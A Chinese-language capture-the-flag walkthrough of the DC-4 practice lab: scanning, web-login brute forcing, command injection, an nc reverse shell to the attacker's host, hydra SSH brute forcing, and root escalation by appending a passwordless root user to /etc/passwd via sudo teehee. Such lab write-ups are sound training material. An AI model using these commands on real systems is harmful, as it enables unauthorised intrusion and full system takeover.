前言
DC靶场很适合拿来做渗透测试,让我们慢慢熟悉渗透测试基本流程,特别是熟练反弹shell,提权等技术,非常不错。
一、DC-4靶场
靶场搭建在本地
IP地址:192.168.0.151
可正常访问
nmap扫描开放的端口发现22ssh和80http服务端口开启
nmap -sT -p- --min-rate 2000 192.168.0.151
dirb查看有无隐藏目录
dirb http://192.168.0.151 /usr/share/wordlists/dirb/big.txt -X .php,.txt
没有特别发现
二、暴力破解
观察页面是一个登录界面,可尝试暴力破解用户名和密码
常用破解字典下载链接:https://weakpass.com/
bp抓包设置字典爆破
此处因为我已知用户名为admin,所以第一个playload直接设置为admin,即使不知道,设置两个变量爆破也可以解出,只是比较费时间而已。
可得出密码为happy,用户名admin
成功登录
三、查找可利用漏洞
登陆后继续bp抓包
很容易发现radio处就是一个命令执行,命令与参数之间用+号连接
更改一下命令查看效果
cat /etc/passwd
即可发现命令执行漏洞
四、反弹shell
在radio处更改命令
nc+192.168.0.107+8001+-e+/bin/bash
查看kali监听端口
shell反弹成功
五、提权
尝试sudo提权,查看/etc/passwd文件,suid位提权方式等都不行
suid提权一般的查询语句有
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {
} \;
提示权限不够
查看一下home目录呢
home目录中有三个用户charles,jim,sam
再进入到三个用户目录里查找信息,发现/home/jim目录中存在着密码的备份文件old-passwords.bak,并且22号端口是开启的,那么我们可以尝试使用暴力破解远程登录。进而拿到一个root创建的用户,进而继续尝试后续提权操作。
将里面的内容复制到kali并创建passwd.txt,user.txt中写入三个用户名jim,sam,charles
再进行暴力破解
hydra -L user.txt -P passwd.txt ssh://192.168.0.151
得到用户名为jim,密码jibri104
然后使用ssh远程登录
当前为普通用户,再进行提权
上面提示有mail
查看一下/var/mail,发现是charles发的并且还有他的密码
登陆一下试试
登录成功
再试试sudo提权
发现了/usr/bin/teehee,但是在sudo提权网站上没有提权命令
查看teehee --help文档,大致知晓其作用是:将标准输入复制到每个FILE,也复制到标准输出。
所以可以尝试添加一个root权限的用户,使用标准输出修改/etc/passwd中的该用户信息,使得其无密码即可登录:
仿照root来写
echo "hp::0:0:root:/root:/bin/bash" | sudo teehee -a /etc/passwd
写入成功,登录便可以看到已经是root权限了
总结
DC-4的渗透考验我们的地方非常多,特别是对信息的收集,敏感文件的查看,思路一定要打开。